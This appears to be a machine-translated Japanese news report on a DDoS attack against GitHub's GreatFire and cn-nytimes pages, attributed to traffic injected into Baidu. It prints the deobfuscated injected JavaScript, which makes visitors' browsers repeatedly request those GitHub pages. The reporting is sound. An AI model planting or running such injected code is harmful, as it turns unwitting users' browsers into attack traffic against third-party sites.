一部のユーザーはサービスを利用できなくなりました。 2時間前の twitterの最後の投稿。
どうやら、攻撃は中国起源です。 中国最大のバイドゥ検索エンジンへの訪問者の中には、HTTPパッケージに2秒ごとにGithubからgithub.com/greatfireおよびgithub.com/cn-nytimesを要求する外部スクリプトがあるという証拠があります。
悪意のあるスクリプトはhm.baidu.com/h.jsです。 空にする必要がありますが、HTTPインジェクションはそのようなコンテンツを受信します。
難読化解除後のリスト
document.write("<script src="http://libs.baidu.com/jquery/2.0.0/jquery.min.js">// <![CDATA[ \x3c/script>"); !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>"); startime = (new Date).getTime(); var count = 0; function unixtime() { var a = new Date; return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3 } url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"]; NUM = url_array.length; function r_send2() { var a = unixtime() % NUM; get(url_array[a]) } function get(a) { var b; $.ajax({ url: a, dataType: "script", timeout: 1E4, cache: !0, beforeSend: function() { requestTime = (new Date).getTime() }, complete: function() { responseTime = (new Date).getTime(); b = Math.floor(responseTime - requestTime); 3E5 > responseTime - startime && (r_send(b), count += 1) } }) } function r_send(a) { setTimeout("r_send2()", a) } setTimeout("r_send2()", 2E3);
これが当てはまる場合、DDoS攻撃は本質的に政治的なものである可能性があり、詳細なトラフィック検査の助けを借りて政府機関が参加して実行される可能性があります。 おそらく、当局は上記のアドレスでソフトウェアツールへのアクセスを妨害しようとしているのでしょう。 これらは、中国の検閲を回避するためのVPNおよびその他のプログラムです。
DDoS攻撃の結果、他のすべてのGithubユーザーも被害を受けます。
ちなみに、GreatFireプロジェクト管理者は1週間前に、1時間あたり約26億リクエスト(通常のレベルの約2500倍)の容量でDDoS攻撃が開始されたと報告しました。 活動家は、Amazonのトラフィックに対して1日あたり30,000ドルを支払う必要があります。